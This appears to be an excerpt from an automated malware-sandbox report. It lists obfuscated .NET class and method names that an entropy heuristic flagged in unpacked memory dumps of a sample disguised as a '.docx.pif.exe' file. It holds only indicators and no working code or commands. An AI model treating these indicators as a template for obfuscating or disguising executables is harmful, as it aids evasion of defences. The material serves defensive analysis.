                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.6e30000.7.raw.unpack, fspkOWvogMOU36TAoN.csHigh entropy of concatenated method names: 'tAFm3abwfM', 'MdQmd7WPix', 'zKXmHgWhfm', 'BtgmgIq9iP', 'HBwmWhy1lP', 'nLUmnbxyYJ', 'LMimiFeyPP', 'dK1yGqRw0L', 'gr8yjHqQF7', 'KAuyB7pl29'
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.6e30000.7.raw.unpack, s1uhC0LTpfAvYaiZjt.csHigh entropy of concatenated method names: 'ToString', 'TaSSJOUJdB', 'dToSNfMl8Q', 'hy7SQ70x57', 'jWAShpYpHZ', 'RwDS6eNviQ', 'Ts3S5WRtih', 'QIDSPoU7gc', 'TN6SrEtM3L', 'o9KS2mg7Nm'
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.6e30000.7.raw.unpack, SgBrdEKGapRfKEKkNh.csHigh entropy of concatenated method names: 'b5WeuaXnF', 'YjHZGiX7Y', 'R7BTVxfZk', 'FGHbPNuMS', 'KZY1JCQnM', 'XSrEqPofF', 'vKfgkcD8PCy0jh8eIi', 'NfIKNlCuym4prw6cmX', 'XMmyUUe55', 'OmA9Y4kE7'
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.6e30000.7.raw.unpack, OpOgmCw6PPUf8olH7e.csHigh entropy of concatenated method names: 'lCSMt1g6rh', 'uxyM11trDN', 'MRpMukmKFN', 'Y28MNRm8OM', 'oK3MhnWw5x', 'd6iM60vqO1', 'ApuMPNwdt1', 'bBZMr7DNuO', 'EHGMsZAr8Q', 'DYtMJObaU1'
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.441f430.2.raw.unpack, oxcyjc1LDHjoCrebX9.csHigh entropy of concatenated method names: 'CpeFZUsOAK', 'ffWFT0XXQ8', 'cRvFt9btKt', 'zT9F1vSx30', 'TpJF76fsMy', 'h1bFSO0WEQ', 'vVUFCJYFHA', 'bhhFytBCp0', 'u0kFmVGkif', 'C9MF9meTA7'
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.441f430.2.raw.unpack, mtvXm3uIEAO1aOMiyD.csHigh entropy of concatenated method names: 'c0milBFjFK', 'hTOiWMHxTV', 'AsPinGlJIO', 'g1uiar8qjC', 'NZxiAZVchj', 'GD0n0QGOqE', 'qIhn4jjovH', 'N9DnGh5vjd', 'HudnjUsN51', 'qHwnBQoRpn'
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.441f430.2.raw.unpack, wOvN8bjY05qG3h2W8d.csHigh entropy of concatenated method names: 'Sr6ygxiaYx', 'rwfyWo1LHn', 'J3yyFIWqgs', 'prAynrpD0X', 'KMDyiBaq2C', 'skMyasn07F', 'oLiyAycMAm', 'qu2yOwgwf7', 'd5fyxlQnuc', 'KIvyoQ4EBQ'
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.441f430.2.raw.unpack, YL2q2YAVtmpvhXuwY3.csHigh entropy of concatenated method names: 'nGjdlidUc5', 'BEOdgtBWR3', 'f3EdWwfCY8', 'k00dF4aMpe', 'XCAdnpjDT0', 'mLgdih6Yrv', 'qZrdaV1W46', 'TFDdAmRVJh', 'DsmdOvsiU7', 'xW9dxCCdBM'
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.441f430.2.raw.unpack, PenYE0tkOYCLDqwRMy.csHigh entropy of concatenated method names: 'OZ2WqovcLY', 'W6EWpoJ0FP', 'YDNWLn2lWn', 'S5DWkwfnRL', 'HxhW098Ls7', 'cd8W4UiHtJ', 'lEnWGZAEua', 'nWyWjpUK0y', 'Lk5WBYBomk', 'faJWv5feyx'
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.441f430.2.raw.unpack, DWbfV733wDM7SoPHEF6.csHigh entropy of concatenated method names: 'ToString', 'yf59dP2XpZ', 'bUX9H0j1dF', 'v4l9l26UMr', 'qWM9ghK2xI', 'asS9WUxQg4', 'ioo9Frw13P', 'GJF9n3jBEw', 'Ptm8aGGrnB507pBDKR0', 'cCPRQuGGl0M7NqkkF6P'
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.441f430.2.raw.unpack, qKcUIQWYkr2kHlVcDF.csHigh entropy of concatenated method names: 'Dispose', 'FMN3B1onPs', 'aBvKN0TurG', 'RonttfPa2y', 'xXO3vvN8bY', 'U5q3zG3h2W', 'ProcessDialogKey', 'BdbKYqQ9hF', 'Sg8K35nfpH', 'SYgKKgspkO'
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.441f430.2.raw.unpack, v0UVJv4Fuk8ZSL2f7F.csHigh entropy of concatenated method names: 'ADTCjxTKwn', 'AxCCvrCUPZ', 'gbiyY7k1ll', 'P8Sy3rvXf6', 'WIqCJCqSkS', 'xg4CIc3Ebq', 'K4JCwhA34c', 'zIOCq3LxMo', 'SybCpGX2uA', 'yQgCLHIsRV'
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.441f430.2.raw.unpack, ALpl925dRu9MqQXKDu.csHigh entropy of concatenated method names: 'oIwiLLvTPx', 'DPPik0p32Z', 'UBji0ZAewF', 'ToString', 'UVPi4hnMHU', 'cuMiGGoli3', 'TYugPnwIkXNdX6d0qcq', 'iMScspwfwXoIf5qeD4r', 'uRnOqOwmsq7sFZfWfJA', 'jIq298wgC0fl9F1MINd'
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.441f430.2.raw.unpack, fJAQuF3YIVEeN8MhNPj.csHigh entropy of concatenated method names: 'mVQmVGrnR1', 'SAcmRDBpb4', 'VJHmehkTYa', 'wALmZg41J8', 'l03m8bMRp3', 'TfymTpkQnB', 'eQ5mbW1sDA', 'bAfmtTOLXs', 'JNxm1sSiNM', 'yZRmECQ6Eo'
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.441f430.2.raw.unpack, icvX8XzjLawXkxgs9u.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'jjMmMwHhTW', 'Aqvm7r0f0G', 'gVsmS14DUf', 'ENtmCIbPXV', 'mV7myWetvB', 'HiXmmtg9SP', 'khGm9XRUjO'
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.441f430.2.raw.unpack, EyMqHCPs9E9FenpsLm.csHigh entropy of concatenated method names: 'xvBagsCXW4', 'J7raFH66Eq', 'kP5aiVR3wa', 'QV9ivkLh0v', 'nTSiz5yecs', 'fNAaYUDGxS', 'IMma3TLuYM', 'SYCaKj6rdg', 'YufadClNQk', 'bh8aHJeSs7'
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.441f430.2.raw.unpack, sXXw773dDD510lc6jEC.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'PGK9qQkYUJ', 'wEg9pijEGS', 'heX9LhSSuN', 'mjg9kJ5mtE', 'pUP90e6fmX', 'wJ794VXkGu', 'ySc9G2eFjM'
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.441f430.2.raw.unpack, DqQ9hFBLg85nfpHLYg.csHigh entropy of concatenated method names: 'UEKyuBooGO', 'zHfyNtb4tI', 'pKvyQ9sLPA', 'dmiyhubaq7', 'X7qyqZp5UG', 'yoXy6FA4ph', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.441f430.2.raw.unpack, xOjHSwE9BsL66jh6xb.csHigh entropy of concatenated method names: 'WhBn8QlguT', 'I6nnbLN2Vn', 'd74FQsRJUf', 'm6rFhsgGx8', 'qCmF67MAsI', 'bGYF5sTXdw', 'upQFP9ndev', 'fOMFrQi4jm', 'gSOF2TIhRs', 'EALFs1EVqK'
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.441f430.2.raw.unpack, spQoUaHnJ5qLMKORun.csHigh entropy of concatenated method names: 'mcI3aenYE0', 'TOY3ACLDqw', 'xLD3xHjoCr', 'zbX3o9VOjH', 'Wh637xbotv', 'wm33SIEAO1', 'J7x1FueM0GLDd6eQnJ', 'KWGbqQbychIN9Ffyr3', 'wJw33b2NCf', 'z4m3d0066t'
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.441f430.2.raw.unpack, SiNRcVkQKnvrVZtVoQ.csHigh entropy of concatenated method names: 'wM1CxvY9Hs', 'oDwCoQd8vo', 'ToString', 'pjrCgXAEu3', 'OW5CWIiYmK', 'gAOCFcjJSm', 'VjWCnh6dhi', 'TK4CieaxFB', 'kbMCaJUjQy', 'LHgCAXEZCU'
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.441f430.2.raw.unpack, xo5PZY2ot5o5nvQbi0.csHigh entropy of concatenated method names: 'eaXaVV6l9r', 'AZmaRmIx87', 'VVwaeXiXiX', 'eudaZIRScA', 'H8va8iWjmv', 'FsyaTgpsXj', 'S5uab8LvLP', 'clSatNDI7e', 'gnka17QghX', 'gNXaEDiCyV'
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.441f430.2.raw.unpack, RdIWAaqWmQBYJZJocJ.csHigh entropy of concatenated method names: 'v0j7svN4HF', 'dSZ7IY9GTv', 'DYn7qGJLat', 'nBa7phdhlR', 'kwv7NeB87C', 'egY7QhGgvq', 'JwT7h6SR7W', 'BGn76kVla3', 'rba75e67Dn', 'mVO7PCbnyJ'
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.441f430.2.raw.unpack, fspkOWvogMOU36TAoN.csHigh entropy of concatenated method names: 'tAFm3abwfM', 'MdQmd7WPix', 'zKXmHgWhfm', 'BtgmgIq9iP', 'HBwmWhy1lP', 'nLUmnbxyYJ', 'LMimiFeyPP', 'dK1yGqRw0L', 'gr8yjHqQF7', 'KAuyB7pl29'
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.441f430.2.raw.unpack, s1uhC0LTpfAvYaiZjt.csHigh entropy of concatenated method names: 'ToString', 'TaSSJOUJdB', 'dToSNfMl8Q', 'hy7SQ70x57', 'jWAShpYpHZ', 'RwDS6eNviQ', 'Ts3S5WRtih', 'QIDSPoU7gc', 'TN6SrEtM3L', 'o9KS2mg7Nm'
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.441f430.2.raw.unpack, SgBrdEKGapRfKEKkNh.csHigh entropy of concatenated method names: 'b5WeuaXnF', 'YjHZGiX7Y', 'R7BTVxfZk', 'FGHbPNuMS', 'KZY1JCQnM', 'XSrEqPofF', 'vKfgkcD8PCy0jh8eIi', 'NfIKNlCuym4prw6cmX', 'XMmyUUe55', 'OmA9Y4kE7'
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.441f430.2.raw.unpack, OpOgmCw6PPUf8olH7e.csHigh entropy of concatenated method names: 'lCSMt1g6rh', 'uxyM11trDN', 'MRpMukmKFN', 'Y28MNRm8OM', 'oK3MhnWw5x', 'd6iM60vqO1', 'ApuMPNwdt1', 'bBZMr7DNuO', 'EHGMsZAr8Q', 'DYtMJObaU1'
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.44d9c50.1.raw.unpack, oxcyjc1LDHjoCrebX9.csHigh entropy of concatenated method names: 'CpeFZUsOAK', 'ffWFT0XXQ8', 'cRvFt9btKt', 'zT9F1vSx30', 'TpJF76fsMy', 'h1bFSO0WEQ', 'vVUFCJYFHA', 'bhhFytBCp0', 'u0kFmVGkif', 'C9MF9meTA7'
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.44d9c50.1.raw.unpack, mtvXm3uIEAO1aOMiyD.csHigh entropy of concatenated method names: 'c0milBFjFK', 'hTOiWMHxTV', 'AsPinGlJIO', 'g1uiar8qjC', 'NZxiAZVchj', 'GD0n0QGOqE', 'qIhn4jjovH', 'N9DnGh5vjd', 'HudnjUsN51', 'qHwnBQoRpn'
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.44d9c50.1.raw.unpack, wOvN8bjY05qG3h2W8d.csHigh entropy of concatenated method names: 'Sr6ygxiaYx', 'rwfyWo1LHn', 'J3yyFIWqgs', 'prAynrpD0X', 'KMDyiBaq2C', 'skMyasn07F', 'oLiyAycMAm', 'qu2yOwgwf7', 'd5fyxlQnuc', 'KIvyoQ4EBQ'
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.44d9c50.1.raw.unpack, YL2q2YAVtmpvhXuwY3.csHigh entropy of concatenated method names: 'nGjdlidUc5', 'BEOdgtBWR3', 'f3EdWwfCY8', 'k00dF4aMpe', 'XCAdnpjDT0', 'mLgdih6Yrv', 'qZrdaV1W46', 'TFDdAmRVJh', 'DsmdOvsiU7', 'xW9dxCCdBM'
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.44d9c50.1.raw.unpack, PenYE0tkOYCLDqwRMy.csHigh entropy of concatenated method names: 'OZ2WqovcLY', 'W6EWpoJ0FP', 'YDNWLn2lWn', 'S5DWkwfnRL', 'HxhW098Ls7', 'cd8W4UiHtJ', 'lEnWGZAEua', 'nWyWjpUK0y', 'Lk5WBYBomk', 'faJWv5feyx'
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.44d9c50.1.raw.unpack, DWbfV733wDM7SoPHEF6.csHigh entropy of concatenated method names: 'ToString', 'yf59dP2XpZ', 'bUX9H0j1dF', 'v4l9l26UMr', 'qWM9ghK2xI', 'asS9WUxQg4', 'ioo9Frw13P', 'GJF9n3jBEw', 'Ptm8aGGrnB507pBDKR0', 'cCPRQuGGl0M7NqkkF6P'
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.44d9c50.1.raw.unpack, qKcUIQWYkr2kHlVcDF.csHigh entropy of concatenated method names: 'Dispose', 'FMN3B1onPs', 'aBvKN0TurG', 'RonttfPa2y', 'xXO3vvN8bY', 'U5q3zG3h2W', 'ProcessDialogKey', 'BdbKYqQ9hF', 'Sg8K35nfpH', 'SYgKKgspkO'
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.44d9c50.1.raw.unpack, v0UVJv4Fuk8ZSL2f7F.csHigh entropy of concatenated method names: 'ADTCjxTKwn', 'AxCCvrCUPZ', 'gbiyY7k1ll', 'P8Sy3rvXf6', 'WIqCJCqSkS', 'xg4CIc3Ebq', 'K4JCwhA34c', 'zIOCq3LxMo', 'SybCpGX2uA', 'yQgCLHIsRV'
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.44d9c50.1.raw.unpack, ALpl925dRu9MqQXKDu.csHigh entropy of concatenated method names: 'oIwiLLvTPx', 'DPPik0p32Z', 'UBji0ZAewF', 'ToString', 'UVPi4hnMHU', 'cuMiGGoli3', 'TYugPnwIkXNdX6d0qcq', 'iMScspwfwXoIf5qeD4r', 'uRnOqOwmsq7sFZfWfJA', 'jIq298wgC0fl9F1MINd'
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.44d9c50.1.raw.unpack, fJAQuF3YIVEeN8MhNPj.csHigh entropy of concatenated method names: 'mVQmVGrnR1', 'SAcmRDBpb4', 'VJHmehkTYa', 'wALmZg41J8', 'l03m8bMRp3', 'TfymTpkQnB', 'eQ5mbW1sDA', 'bAfmtTOLXs', 'JNxm1sSiNM', 'yZRmECQ6Eo'
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.44d9c50.1.raw.unpack, icvX8XzjLawXkxgs9u.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'jjMmMwHhTW', 'Aqvm7r0f0G', 'gVsmS14DUf', 'ENtmCIbPXV', 'mV7myWetvB', 'HiXmmtg9SP', 'khGm9XRUjO'
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.44d9c50.1.raw.unpack, EyMqHCPs9E9FenpsLm.csHigh entropy of concatenated method names: 'xvBagsCXW4', 'J7raFH66Eq', 'kP5aiVR3wa', 'QV9ivkLh0v', 'nTSiz5yecs', 'fNAaYUDGxS', 'IMma3TLuYM', 'SYCaKj6rdg', 'YufadClNQk', 'bh8aHJeSs7'
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.44d9c50.1.raw.unpack, sXXw773dDD510lc6jEC.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'PGK9qQkYUJ', 'wEg9pijEGS', 'heX9LhSSuN', 'mjg9kJ5mtE', 'pUP90e6fmX', 'wJ794VXkGu', 'ySc9G2eFjM'
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.44d9c50.1.raw.unpack, DqQ9hFBLg85nfpHLYg.csHigh entropy of concatenated method names: 'UEKyuBooGO', 'zHfyNtb4tI', 'pKvyQ9sLPA', 'dmiyhubaq7', 'X7qyqZp5UG', 'yoXy6FA4ph', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.44d9c50.1.raw.unpack, xOjHSwE9BsL66jh6xb.csHigh entropy of concatenated method names: 'WhBn8QlguT', 'I6nnbLN2Vn', 'd74FQsRJUf', 'm6rFhsgGx8', 'qCmF67MAsI', 'bGYF5sTXdw', 'upQFP9ndev', 'fOMFrQi4jm', 'gSOF2TIhRs', 'EALFs1EVqK'
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.44d9c50.1.raw.unpack, spQoUaHnJ5qLMKORun.csHigh entropy of concatenated method names: 'mcI3aenYE0', 'TOY3ACLDqw', 'xLD3xHjoCr', 'zbX3o9VOjH', 'Wh637xbotv', 'wm33SIEAO1', 'J7x1FueM0GLDd6eQnJ', 'KWGbqQbychIN9Ffyr3', 'wJw33b2NCf', 'z4m3d0066t'
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.44d9c50.1.raw.unpack, SiNRcVkQKnvrVZtVoQ.csHigh entropy of concatenated method names: 'wM1CxvY9Hs', 'oDwCoQd8vo', 'ToString', 'pjrCgXAEu3', 'OW5CWIiYmK', 'gAOCFcjJSm', 'VjWCnh6dhi', 'TK4CieaxFB', 'kbMCaJUjQy', 'LHgCAXEZCU'
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.44d9c50.1.raw.unpack, xo5PZY2ot5o5nvQbi0.csHigh entropy of concatenated method names: 'eaXaVV6l9r', 'AZmaRmIx87', 'VVwaeXiXiX', 'eudaZIRScA', 'H8va8iWjmv', 'FsyaTgpsXj', 'S5uab8LvLP', 'clSatNDI7e', 'gnka17QghX', 'gNXaEDiCyV'
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.44d9c50.1.raw.unpack, RdIWAaqWmQBYJZJocJ.csHigh entropy of concatenated method names: 'v0j7svN4HF', 'dSZ7IY9GTv', 'DYn7qGJLat', 'nBa7phdhlR', 'kwv7NeB87C', 'egY7QhGgvq', 'JwT7h6SR7W', 'BGn76kVla3', 'rba75e67Dn', 'mVO7PCbnyJ'
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.44d9c50.1.raw.unpack, fspkOWvogMOU36TAoN.csHigh entropy of concatenated method names: 'tAFm3abwfM', 'MdQmd7WPix', 'zKXmHgWhfm', 'BtgmgIq9iP', 'HBwmWhy1lP', 'nLUmnbxyYJ', 'LMimiFeyPP', 'dK1yGqRw0L', 'gr8yjHqQF7', 'KAuyB7pl29'
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.44d9c50.1.raw.unpack, s1uhC0LTpfAvYaiZjt.csHigh entropy of concatenated method names: 'ToString', 'TaSSJOUJdB', 'dToSNfMl8Q', 'hy7SQ70x57', 'jWAShpYpHZ', 'RwDS6eNviQ', 'Ts3S5WRtih', 'QIDSPoU7gc', 'TN6SrEtM3L', 'o9KS2mg7Nm'
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.44d9c50.1.raw.unpack, SgBrdEKGapRfKEKkNh.csHigh entropy of concatenated method names: 'b5WeuaXnF', 'YjHZGiX7Y', 'R7BTVxfZk', 'FGHbPNuMS', 'KZY1JCQnM', 'XSrEqPofF', 'vKfgkcD8PCy0jh8eIi', 'NfIKNlCuym4prw6cmX', 'XMmyUUe55', 'OmA9Y4kE7'
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.44d9c50.1.raw.unpack, OpOgmCw6PPUf8olH7e.csHigh entropy of concatenated method names: 'lCSMt1g6rh', 'uxyM11trDN', 'MRpMukmKFN', 'Y28MNRm8OM', 'oK3MhnWw5x', 'd6iM60vqO1', 'ApuMPNwdt1', 'bBZMr7DNuO', 'EHGMsZAr8Q', 'DYtMJObaU1'
                Source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, oxcyjc1LDHjoCrebX9.csHigh entropy of concatenated method names: 'CpeFZUsOAK', 'ffWFT0XXQ8', 'cRvFt9btKt', 'zT9F1vSx30', 'TpJF76fsMy', 'h1bFSO0WEQ', 'vVUFCJYFHA', 'bhhFytBCp0', 'u0kFmVGkif', 'C9MF9meTA7'
                Source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, mtvXm3uIEAO1aOMiyD.csHigh entropy of concatenated method names: 'c0milBFjFK', 'hTOiWMHxTV', 'AsPinGlJIO', 'g1uiar8qjC', 'NZxiAZVchj', 'GD0n0QGOqE', 'qIhn4jjovH', 'N9DnGh5vjd', 'HudnjUsN51', 'qHwnBQoRpn'
                Source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, wOvN8bjY05qG3h2W8d.csHigh entropy of concatenated method names: 'Sr6ygxiaYx', 'rwfyWo1LHn', 'J3yyFIWqgs', 'prAynrpD0X', 'KMDyiBaq2C', 'skMyasn07F', 'oLiyAycMAm', 'qu2yOwgwf7', 'd5fyxlQnuc', 'KIvyoQ4EBQ'
                Source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, YL2q2YAVtmpvhXuwY3.csHigh entropy of concatenated method names: 'nGjdlidUc5', 'BEOdgtBWR3', 'f3EdWwfCY8', 'k00dF4aMpe', 'XCAdnpjDT0', 'mLgdih6Yrv', 'qZrdaV1W46', 'TFDdAmRVJh', 'DsmdOvsiU7', 'xW9dxCCdBM'
                Source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, PenYE0tkOYCLDqwRMy.csHigh entropy of concatenated method names: 'OZ2WqovcLY', 'W6EWpoJ0FP', 'YDNWLn2lWn', 'S5DWkwfnRL', 'HxhW098Ls7', 'cd8W4UiHtJ', 'lEnWGZAEua', 'nWyWjpUK0y', 'Lk5WBYBomk', 'faJWv5feyx'
                Source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, DWbfV733wDM7SoPHEF6.csHigh entropy of concatenated method names: 'ToString', 'yf59dP2XpZ', 'bUX9H0j1dF', 'v4l9l26UMr', 'qWM9ghK2xI', 'asS9WUxQg4', 'ioo9Frw13P', 'GJF9n3jBEw', 'Ptm8aGGrnB507pBDKR0', 'cCPRQuGGl0M7NqkkF6P'
                Source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, qKcUIQWYkr2kHlVcDF.csHigh entropy of concatenated method names: 'Dispose', 'FMN3B1onPs', 'aBvKN0TurG', 'RonttfPa2y', 'xXO3vvN8bY', 'U5q3zG3h2W', 'ProcessDialogKey', 'BdbKYqQ9hF', 'Sg8K35nfpH', 'SYgKKgspkO'
                Source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, v0UVJv4Fuk8ZSL2f7F.csHigh entropy of concatenated method names: 'ADTCjxTKwn', 'AxCCvrCUPZ', 'gbiyY7k1ll', 'P8Sy3rvXf6', 'WIqCJCqSkS', 'xg4CIc3Ebq', 'K4JCwhA34c', 'zIOCq3LxMo', 'SybCpGX2uA', 'yQgCLHIsRV'
                Source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, ALpl925dRu9MqQXKDu.csHigh entropy of concatenated method names: 'oIwiLLvTPx', 'DPPik0p32Z', 'UBji0ZAewF', 'ToString', 'UVPi4hnMHU', 'cuMiGGoli3', 'TYugPnwIkXNdX6d0qcq', 'iMScspwfwXoIf5qeD4r', 'uRnOqOwmsq7sFZfWfJA', 'jIq298wgC0fl9F1MINd'
                Source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, fJAQuF3YIVEeN8MhNPj.csHigh entropy of concatenated method names: 'mVQmVGrnR1', 'SAcmRDBpb4', 'VJHmehkTYa', 'wALmZg41J8', 'l03m8bMRp3', 'TfymTpkQnB', 'eQ5mbW1sDA', 'bAfmtTOLXs', 'JNxm1sSiNM', 'yZRmECQ6Eo'
                Source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, icvX8XzjLawXkxgs9u.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'jjMmMwHhTW', 'Aqvm7r0f0G', 'gVsmS14DUf', 'ENtmCIbPXV', 'mV7myWetvB', 'HiXmmtg9SP', 'khGm9XRUjO'
                Source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, EyMqHCPs9E9FenpsLm.csHigh entropy of concatenated method names: 'xvBagsCXW4', 'J7raFH66Eq', 'kP5aiVR3wa', 'QV9ivkLh0v', 'nTSiz5yecs', 'fNAaYUDGxS', 'IMma3TLuYM', 'SYCaKj6rdg', 'YufadClNQk', 'bh8aHJeSs7'
                Source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, sXXw773dDD510lc6jEC.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'PGK9qQkYUJ', 'wEg9pijEGS', 'heX9LhSSuN', 'mjg9kJ5mtE', 'pUP90e6fmX', 'wJ794VXkGu', 'ySc9G2eFjM'
                Source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, DqQ9hFBLg85nfpHLYg.csHigh entropy of concatenated method names: 'UEKyuBooGO', 'zHfyNtb4tI', 'pKvyQ9sLPA', 'dmiyhubaq7', 'X7qyqZp5UG', 'yoXy6FA4ph', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, xOjHSwE9BsL66jh6xb.csHigh entropy of concatenated method names: 'WhBn8QlguT', 'I6nnbLN2Vn', 'd74FQsRJUf', 'm6rFhsgGx8', 'qCmF67MAsI', 'bGYF5sTXdw', 'upQFP9ndev', 'fOMFrQi4jm', 'gSOF2TIhRs', 'EALFs1EVqK'
                Source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, spQoUaHnJ5qLMKORun.csHigh entropy of concatenated method names: 'mcI3aenYE0', 'TOY3ACLDqw', 'xLD3xHjoCr', 'zbX3o9VOjH', 'Wh637xbotv', 'wm33SIEAO1', 'J7x1FueM0GLDd6eQnJ', 'KWGbqQbychIN9Ffyr3', 'wJw33b2NCf', 'z4m3d0066t'
                Source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, SiNRcVkQKnvrVZtVoQ.csHigh entropy of concatenated method names: 'wM1CxvY9Hs', 'oDwCoQd8vo', 'ToString', 'pjrCgXAEu3', 'OW5CWIiYmK', 'gAOCFcjJSm', 'VjWCnh6dhi', 'TK4CieaxFB', 'kbMCaJUjQy', 'LHgCAXEZCU'
                Source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, xo5PZY2ot5o5nvQbi0.csHigh entropy of concatenated method names: 'eaXaVV6l9r', 'AZmaRmIx87', 'VVwaeXiXiX', 'eudaZIRScA', 'H8va8iWjmv', 'FsyaTgpsXj', 'S5uab8LvLP', 'clSatNDI7e', 'gnka17QghX', 'gNXaEDiCyV'
                Source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, RdIWAaqWmQBYJZJocJ.csHigh entropy of concatenated method names: 'v0j7svN4HF', 'dSZ7IY9GTv', 'DYn7qGJLat', 'nBa7phdhlR', 'kwv7NeB87C', 'egY7QhGgvq', 'JwT7h6SR7W', 'BGn76kVla3', 'rba75e67Dn', 'mVO7PCbnyJ'
                Source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, fspkOWvogMOU36TAoN.csHigh entropy of concatenated method names: 'tAFm3abwfM', 'MdQmd7WPix', 'zKXmHgWhfm', 'BtgmgIq9iP', 'HBwmWhy1lP', 'nLUmnbxyYJ', 'LMimiFeyPP', 'dK1yGqRw0L', 'gr8yjHqQF7', 'KAuyB7pl29'
                Source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, s1uhC0LTpfAvYaiZjt.csHigh entropy of concatenated method names: 'ToString', 'TaSSJOUJdB', 'dToSNfMl8Q', 'hy7SQ70x57', 'jWAShpYpHZ', 'RwDS6eNviQ', 'Ts3S5WRtih', 'QIDSPoU7gc', 'TN6SrEtM3L', 'o9KS2mg7Nm'
